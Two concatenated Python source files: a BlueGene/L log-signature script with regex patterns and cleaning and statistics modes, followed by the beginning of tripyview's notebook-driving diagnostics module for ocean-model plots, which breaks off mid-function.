r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL DISCOVERY SEVERE {serialnumber_ipaddress}$".format( serialnumber_ipaddress=serialnumber_ipaddress),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL DISCOVERY WARNING Problem communicating with service card, ido chip: {hexcharcol}+?\. java.lang.IllegalStateException: while executing CONTROL Operation caught java.lang.RuntimeException: Communication error: \(DirectIDo for com.ibm.ido.DirectIDo object \[{LP_ADDRESS}@/{ip4andport} with image version \d+? and card type \d+?] is in state = COMMUNICATION_ERROR, sequenceNumberIsOk = false, ExpectedSequenceNumber = .+?, Reply Sequence Number = .+?, timedOut = true, retries = 200, timeout = 1000, Expected Op Command = .+?, Actual Op Reply = .+?, Expected Sync Command = .+?, Actual Sync Reply = .+?\)$".format(hexcharcol=hexcharcol, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL HARDWARE SEVERE NodeCard power module U\d\d is not accessible$".format( ),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL HARDWARE SEVERE NodeCard temperature sensor chip U\d\d is not accessible$",
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL HARDWARE SEVERE NodeCard VPD chip is not accessible$",
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL HARDWARE SEVERE NodeCard VPD is corrupt$",
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL HARDWARE WARNING EndServiceAction \d+?.*? performed upon {nodeid3} by .+?$".format( nodeid3=nodeid3, ),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL HARDWARE WARNING EndServiceAction is restarting the LinkCards in midplane {nodeid3} as part of Service Action \d\d\d$".format( nodeid3=nodeid3, ),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL HARDWARE WARNING EndServiceAction is restarting the (NodeCards|Node cards) in midplane {nodeid3} as part of Service Action \d+?$",
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL SERV_NET ERROR DeclareServiceNetworkCharacteristics has been run with the force option but the DB is not empty$".format( ip4andport=ip4andport),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL SERV_NET INFO Added 8 subnets and 409600 addresses to DB$".format( ip4andport=ip4andport),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL SERV_NET WARNING DeclareServiceNetworkCharacteristics has been run but the DB is not empty$".format( ip4andport=ip4andport),
r"^(APPALLOC|APPBUSY|APPCHILD) TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: Error creating node map from file .+?: .+?$",
r"^APP.+? TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL {ciod_login_input_output}$".format( ciod_login_input_output=ciod_login_input_output),
r"^APPREAD TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: failed to read message prefix on control stream \(CioStream socket to {ip4andport}".format( ip4andport=ip4andport),
r"^APP.+? TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: Error reading message prefix after .+? on CioStream socket to {ip4andport}: .+?$".format( ip4andport=ip4andport),
r"^APP.+? TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: Error reading message prefix on CioStream socket to {ip4andport}, .+?$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^APPTORUS TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL external input interrupt \(unit=0x02 bit=0x00\): uncorrectable torus error$",
r"^APPUNAV TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: Error creating node map from file /.+?: Resource temporarily unavailable$",
r"^KERNBIT TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL ddr: redundant bit steering failed, sequencer timeout$",
r"^KERNCON TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL idoproxy communication failure: BGLERR_IDO_PKT_TIMEOUT connection lost to node/link/service card$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^KERNCON TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL MailboxMonitor::serviceMailboxes\(\) lib_ido_error: -1033 BGLERR_IDO_PKT_TIMEOUT connection lost to node/link/service card$",
r"^KERNDTLB TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL data TLB error interrupt$",
r"^KERNEXT TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL external input interrupt \(unit=0x.+? bit=0x.+?\): tree header with no target waiting$",
r"^KERNFLOAT TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL floating point unavailable interrupt$",
r"^KERNMC TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL DDR machine check register: {hex_address} {hex_address}$".format(hex_address=hex_address, ),
r"^KERNMC TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL machine check interrupt.*?$",
r"^KERNMICRO TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL Microloader Assertion$",
r"^KERNMNT TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL Error: unable to mount filesystem$",
r"^KERNMNTF TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL Lustre mount FAILED : .+? .+?",
r"^KERNNOETH TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL no ethernet link$",
r"^KERNPAN TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL kernel panic$",
r"^KERNPOW TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS KERNEL FATAL Power deactivated: {nodeid3}$".format( nodeid3=nodeid3, ),
r"^KERNPROG TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL program interrupt$",
r"^KERNREC TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL Error receiving packet on tree network.*?$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^KERNRTSA TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL rts assertion failed: .*?$",
r"^KERNRTSP TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL rts panic! - stopping execution$",
r"^KERNSERV TIME_STAMP SHORT_DATE (NODE_ID_01|NULL) DATE_TIME (NODE_ID_01|NULL) RAS KERNEL FATAL Power Good signal deactivated: {nodeid3}. A service action may be required.$".format(nodeid3=nodeid3),
r"^KERNSOCK TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL idoproxy communication failure: socket closed$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^KERNSOCK TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL MailboxMonitor::serviceMailboxes\(\) lib_ido_error: -1019 socket closed$",
r"^KERNSTOR TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL data storage interrupt$",
r"^KERNTERM TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL rts: kernel terminated for reason .*?$",
r"^KERNTLBE TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL instruction TLB error interrupt$".format( ip4andport=ip4andport),
r"^LINKBLL TIME_STAMP SHORT_DATE NODE_ID_02 DATE_TIME NODE_ID_02 RAS LINKCARD FATAL MidplaneSwitchController::clearPort\(\) bll_clear_port failed: {nodeid2}$".format( nodeid2=nodeid2, ip4andport=ip4andport),
r"^LINKDISC TIME_STAMP SHORT_DATE NODE_ID_02 DATE_TIME NODE_ID_02 RAS LINKCARD FATAL MidplaneSwitchController::sendTrain\(\) port disconnected: {nodeid2}$".format( nodeid2=nodeid2, ),
r"^LINKIAP TIME_STAMP SHORT_DATE NODE_ID_02 DATE_TIME NODE_ID_02 RAS LINKCARD FATAL MidplaneSwitchController::receiveTrain\(\) iap failed: {nodeid2}, status={eight_hex} {eight_hex}$".format(eight_hex=eight_hex, nodeid2=nodeid2, ),
r"^LINKPAP TIME_STAMP SHORT_DATE NODE_ID_02 DATE_TIME NODE_ID_02 RAS LINKCARD FATAL MidplaneSwitchController::parityAlignment\(\) pap failed: {nodeid2}, status={eight_hex} {eight_hex}$".format(eight_hex=eight_hex, nodeid2=nodeid2),
r"^MASABNORM TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS BGLMASTER FAILURE mmcs_server exited abnormally due to signal: .+?$",
r"^MASABNORM TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS BGLMASTER FAILURE {ciodb_exited_abnormally}$".format(ciodb_exited_abnormally=ciodb_exited_abnormally),
r"^MASNORM TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS BGLMASTER FAILURE {mmcs_server_exited_normally}$".format( mmcs_server_exited_normally=mmcs_server_exited_normally),
r"^MMCS TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS MMCS FATAL L3 major internal error$",
r"^MONILL TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE monitor caught java.lang.IllegalStateException: while executing CONTROL Operation caught java.io.EOFException and is stopping$",
r"^MONNULL TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE While inserting monitor info into DB caught java.lang.NullPointerException$".format( ip4andport=ip4andport),
r"^MONPOW TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE monitor caught java.lang.UnsupportedOperationException: power module U\d\d not present and is stopping$".format( ip4andport=ip4andport),
r"^MONPOW TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE No power module U.+? found found on link card$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^MONPOW TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE power module status fault detected on node card. status registers are: .+?$".format(eight_hex=eight_hex, ),
r"^R_DDR_EXC TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {ddr_excessive_soft_failures}$".format( ddr_excessive_soft_failures = ddr_excessive_soft_failures),
r"^R_DDR_STR TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {ddr_unable_to_steer_rank_already_steering}$".format(ddr_unable_to_steer_rank_already_steering=ddr_unable_to_steer_rank_already_steering),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL DISCOVERY (WARNING|SEVERE) While initializing .+? card.*?$".format(LP_ADDRESS=LP_ADDRESS),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL DISCOVERY (WARNING|SEVERE) Problem communicating with node card, iDo machine with LP of {LP_ADDRESS} caught java.lang.IllegalStateException: while executing .+? Operation .*?$".format(LP_ADDRESS=LP_ADDRESS),
]
# initializing_node_caught_exception
# compile regular expression for faster execution (patterns get cached)
signatures_by_id = {}
for pattern_id, pattern in enumerate(KNOWN_LOGLINE_PATTERN):
try:
KNOWN_LOGLINE_PATTERN[pattern_id]=re.compile(pattern, re.IGNORECASE)
signatures_by_id[pattern_id+1]=pattern # pattern_id + 1 because 0 is reserved
except re.error as err:
print("pattern failed to compile:", pattern_id, pattern, err)
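# Return the 1-based id of the first compiled pattern that matches the given log line,
# or 0 when no known signature matches (0 is reserved for "unknown message").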
def extract_pattern_id(message):
for pattern_id, pattern in enumerate(KNOWN_LOGLINE_PATTERN):
#print message, pattern
if re.search(pattern, message):
return pattern_id+1 # pattern_id + 1 because 0 is reserved
return 0 # no pattern to parse log line, unknown message
# Print iterations progress
def print_progress (iteration, total, prefix = '', suffix = '', decimals = 2, barLength = 100):
import sys
filledLength = int(round(barLength * iteration / float(total)))
percents = round(100.00 * (iteration / float(total)), decimals)
bar = '#' * filledLength + '-' * (barLength - filledLength)
sys.stdout.write('%s [%s] %s%s %s\r' % (prefix, bar, percents, '%', suffix))
sys.stdout.flush()
if iteration == total:
print("\n")
if __name__ == '__main__':
import time
# parse command line arguments
parser = argparse.ArgumentParser(description='Parses a logfile and prints the first line that does not match one of the known regex patterns')
parser.add_argument('-if', '--in_file', type=str, default="bgl2_clean_workingcopy.log", help='log file to scan')
parser.add_argument('-t', '--truncate', action='store_true', help='drop lines that already match a known pattern from the working copy')
parser.add_argument('-pd', '--print_duplicates', action='store_true', help='report lines matched by no pattern or by more than one pattern')
parser.add_argument('-c', '--clean', action='store_true', help='normalize timestamps, dates and node ids into placeholder tokens')
parser.add_argument("-ds", "--dataset_statistics", action='store_true', help="count matches per pattern and print summary statistics")
parser.add_argument("-ss", "--show_sorted", action='store_true', help="print all known patterns in sorted order")
args = parser.parse_args()
total_lines = 4747954.0
one_percent_of_lines = int(total_lines/100)
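# --clean: blank out timestamps/dates (TIME_STAMP, SHORT_DATE, DATE_TIME) and map raw BGL locations
# onto NODE_ID_01/02/03, so the raw log matches the placeholder tokens used by the patterns above.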
if args.clean:
of = open("%s_clean"%args.in_file, "w")
with open("%s"%args.in_file,"r") as logs:
for i,log_line in enumerate(logs):
split_line = log_line.split(" ")
split_line[1] = "TIME_STAMP"
split_line[2] = "SHORT_DATE"
if split_line[3]=="NULL":
node_id = "NULL"
elif split_line[3]=="UNKNOWN_LOCATION":
node_id = "UNKNOWN_LOCATION"
elif re.search(r"R\d{2}-M\d-N\w-\w:J\d{2}-U\d{2}",split_line[3]):
node_id = "NODE_ID_01"
elif re.search(r"R\d{2}-M\d-L\d-U\d{2}-\w",split_line[3]):
node_id = "NODE_ID_02"
elif re.search(r"R\d{2}-M\d-?[NL]?\w?",split_line[3]):
node_id = "NODE_ID_03"
else:
node_id = split_line[3]
if split_line[3]==split_line[5]:
split_line[3]=node_id
split_line[5]=node_id
split_line[4]="DATE_TIME"
if i % one_percent_of_lines ==0 : print("%i lines processed, %.2f done "%(i,100*i / total_lines ))
of.write(" ".join(split_line))
of.close()
elif args.truncate and False:
matched_lines = 0
of = open("bgl2_clean_workingcopy_new.log", "w")
with open("bgl2.log","r") as logs:
for i,log_line in enumerate(logs):
if i % one_percent_of_lines ==0 : print("%i lines processed, %.2f done "%(i,100*i / total_lines ))
if extract_pattern_id(log_line) == 0:
of.write(log_line)
else:
matched_lines+=1
of.close()
import os
os.remove("bgl2_clean_workingcopy.log")
os.rename("bgl2_clean_workingcopy_new.log","bgl2_clean_workingcopy.log")
print("{} signatures matched {} lines, {:.3f}% done.".format(len(KNOWN_LOGLINE_PATTERN), matched_lines, 100*matched_lines / total_lines ))
elif args.print_duplicates:
lines_with_more_signatures = {}
log_lines_with_no_signatures = []
with open("bgl2.log","r") as logs:
total_ops = 4747954 * len(KNOWN_LOGLINE_PATTERN)
current_op = 0
for line_id,log_line in enumerate(logs):
line_signatures=[]
if line_id==0:
s = time.time()
if line_id==10000:
print("Estimated duration: ~ %.2f h"%( (4747954 * (time.time() -s)/10000.0)/3600.0 ) )
for pattern_id, pattern in enumerate(KNOWN_LOGLINE_PATTERN):
current_op+=1
# print_progress(current_op, total_ops, " regex duplication checks finished")
matches = re.search(pattern, log_line)
if matches:
line_signatures.append(pattern_id+1)
if len(line_signatures)==0:
log_lines_with_no_signatures.append(log_line)
print("No pattern matched: %s"%log_line)
if len(line_signatures)>1:
lines_with_more_signatures[line_id] = (log_line, line_signatures, [KNOWN_LOGLINE_PATTERN[s-1] for s in line_signatures] )
print("More pattern matched: %s"%log_line)
print(log_lines_with_no_signatures)
with open("no_signatures.json","w") as f:
json_string = json.dumps(log_lines_with_no_signatures)
f.write(json_string)
print(lines_with_more_signatures)
with open("more_signatures.json","w") as f:
json_string = json.dumps(lines_with_more_signatures)
f.write(json_string)
elif args.dataset_statistics:
with open("bgl2.log","r") as logs:
counts = [0]*(len(KNOWN_LOGLINE_PATTERN)+1)
for i, log_line in enumerate(logs):
if i%500==0:
print_progress(i, total_lines, " counting dataset statistics")
pid = extract_pattern_id(log_line)
counts[pid]+=1
print("Min: %i"%min(counts))
print("Max: %i"%max(counts))
print("Lower Quartile %.2f"%np.percentile(counts, 25))
print("Median: %.2f"%np.median(counts))
print("Upper Quartile %.2f"%np.percentile(counts, 75))
print("Std: %0.2f"%np.std(counts))
with open("counts.json","w") as f:
json_counts_str = json.dumps(counts)
f.write(json_counts_str)
elif args.show_sorted:
for p in sorted([kp.pattern for kp in KNOWN_LOGLINE_PATTERN]):
print(p)
print( "Pattern: %i"%len(KNOWN_LOGLINE_PATTERN))
else:
s = time.time()
total_lines = 736.0
matched_lines = 0
with open(args.in_file,"r") as logs:
for line_id, log_line in enumerate(logs):
print_progress(line_id, total_lines, "Finding non matching signatures...")
if extract_pattern_id(log_line) == 0:
print("{} signatures matched {} lines, {} lines left, {:.3f}% done.".format(len(KNOWN_LOGLINE_PATTERN), matched_lines, int(total_lines-matched_lines), 100*matched_lines / total_lines ))
print("Line that did not match:\n")
print(log_line)
copy2clip(log_line)
break
else:
if line_id % one_percent_of_lines == 0 : print("%i lines processed, %.2f done "%(line_id,100*line_id / total_lines ))
matched_lines+=1
e = time.time()
print("Took %i seconds."%(e-s))
#_______________________________________________________________________________
# tripyview/sub_diagdriver.py (repo: patrickscholz/tripyview, commit 14c232d840db2e879d79b3e3b3286a6962211c47, license: MIT, size: 56,657 bytes, blob: 8e410f4eac7b94b3b990f2e3c62fa5143d1e44ae)
#_______________________________________________________________________________
import yaml
import papermill as pm
import math
import pkg_resources
from jinja2 import Environment, FileSystemLoader
import argparse
import json
import glob
import shutil
import sys
import os
#_______________________________________________________________________________
# open html template file
#try: pkg_path = os.environ['PATH_TRIPYVIEW']
#except: pkg_path=''
pkg_path = os.path.dirname(os.path.dirname(__file__))
templates_path = os.path.join(pkg_path,'templates_html')
templates_nb_path = os.path.join(pkg_path,'templates_notebooks')
file_loader = FileSystemLoader(templates_path)
env = Environment(loader=file_loader)
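# templates_html holds the Jinja2 HTML templates loaded into `env`; templates_notebooks holds the
# parameterised notebooks that the drive_* functions below execute with papermill.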
#
#
#_______________________________________________________________________________
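# drive_hslice: for every variable and depth (and optionally every month) configured in the yaml
# section, execute templates_notebooks/template_hslice.ipynb via papermill and collect the resulting
# figure/notebook paths into a webpage dict.
# Minimal usage sketch (assumes a yaml file with the usual workflow_name/save_path_* keys and an
# 'hslice:' section; file and section names are illustrative):
#   with open('workflow.yml') as f:
#       yaml_settings = yaml.safe_load(f)
#   webpage = drive_hslice(yaml_settings, 'hslice')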
def drive_hslice(yaml_settings, analysis_name):
print(' --> drive_hslice:',analysis_name)
# copy yaml settings for analysis driver --> hslice:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary it is not a primary parameter anymore, e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialise webpage for this analysis
webpage = {}
image_count = 0
#___________________________________________________________________________
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
auxvname = vname.replace('/',':')
which_mon = ''
which_mon2 = ''
if 'mon' in driver_settings[vname].keys():
which_mon = f"_m{driver_settings[vname]['mon']}"
which_mon2 = f" @ mon:{driver_settings[vname]['mon']}"
#_______________________________________________________________________
# loop over depths
for depth in driver_settings[vname]["depths"]:
print(f' --> depth: {depth}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
current_params2["depth"] = depth
current_params2.update(driver_settings[vname])
del current_params2["depths"] # --> delete depth list [0, 100, 1000,...] from current_param dict()
#___________________________________________________________________
# no per-month loop: 'months' not configured for this variable
if 'months' not in driver_settings[vname].keys():
#_______________________________________________________________
if 'proj' in current_params2.keys():
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{current_params2['proj']}_{depth}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{current_params2['proj']}_{depth}.ipynb"
short_name = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{current_params2['proj']}_{depth}"
else:
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{depth}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{depth}.ipynb"
short_name = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{depth}"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#_______________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_hslice.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True,)
#_______________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"{auxvname.capitalize()} @dep:{depth}m"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = short_name
image_count += 1
#___________________________________________________________________
# otherwise loop over the individual months
else:
#_______________________________________________________________
# loop over the configured months
del current_params2["months"]
for month in driver_settings[vname]["months"]:
print(f' --> mon: {month}')
current_params2["mon"] = month
current_params2.update(driver_settings[vname])
#___________________________________________________________
if 'proj' in current_params2.keys():
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{current_params2['proj']}_{depth}_m{month}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{current_params2['proj']}_{depth}_m{month}.ipynb"
short_name = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{current_params2['proj']}_{depth}_m{month}"
else:
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{depth}_m{month}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{depth}_m{month}.ipynb"
short_name = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{depth}_m{month}"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#___________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_hslice.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True,)
#___________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"{auxvname.capitalize()} @dep:{depth}m, @mon:{month}"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = short_name
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
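# drive_hslice_clim: same looping over variables and depths as drive_hslice, but executes
# template_hslice_clim.ipynb (no per-month loop) and returns the corresponding webpage dict.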
def drive_hslice_clim(yaml_settings, analysis_name):
# copy yaml settings for this analysis driver:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary it is not a primary parameter anymore, e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialise webpage for this analysis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute:{vname}')
# loop over depths
for depth in driver_settings[vname]["depths"]:
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
current_params2["depth"] = depth
current_params2.update(driver_settings[vname])
del current_params2["depths"] # --> delete depth list [0, 100, 1000,...] from current_param dict()
# print(current_params2)
#___________________________________________________________________
if 'proj' in current_params2.keys():
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{current_params2['proj']}_{depth}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{current_params2['proj']}_{depth}.ipynb"
short_name = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{current_params2['proj']}_{depth}"
else:
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{depth}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{depth}.ipynb"
short_name = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{depth}"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#___________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_hslice_clim.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True,
)
#___________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"{vname.capitalize()} at {depth} m"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = short_name
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
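# drive_hovm: loop over variables and the box regions listed under 'box_regions', execute
# template_hovm.ipynb for each combination and collect the figure/notebook paths.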
def drive_hovm(yaml_settings, analysis_name):
# copy yaml settings for this analysis driver:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary it is not a primary parameter anymore, e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialise webpage for this analysis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
auxvname = vname.replace('/',':')
# loop over box regions
for box_region in driver_settings[vname]["box_regions"]:
print(f' --> compute: {box_region}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
current_params2["box_region"] = list([box_region])
current_params2.update(driver_settings[vname])
del current_params2["box_regions"] # --> delete box_regions list from current_params dict()
str_boxregion = box_region.split('/')[-1].split('.')[0]
#___________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{str_boxregion}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{str_boxregion}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#___________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_hovm.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True,
)
#___________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"][
"name"
] = f"{auxvname.capitalize()} at {str_boxregion}"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"][
"short_name"
] = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{str_boxregion}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
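# drive_hovm_clim: like drive_hovm but executes template_hovm_clim.ipynb for each
# variable/box-region combination.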
def drive_hovm_clim(yaml_settings, analysis_name):
# copy yaml settings for this analysis driver:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary it is not a primary parameter anymore, e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialise webpage for this analysis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
# loop over box regions
for box_region in driver_settings[vname]["box_regions"]:
print(f' --> compute: {box_region}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
current_params2["box_region"] = list([box_region])
current_params2.update(driver_settings[vname])
del current_params2["box_regions"] # --> delete box_regions list from current_params dict()
str_boxregion = box_region.split('/')[-1].split('.')[0]
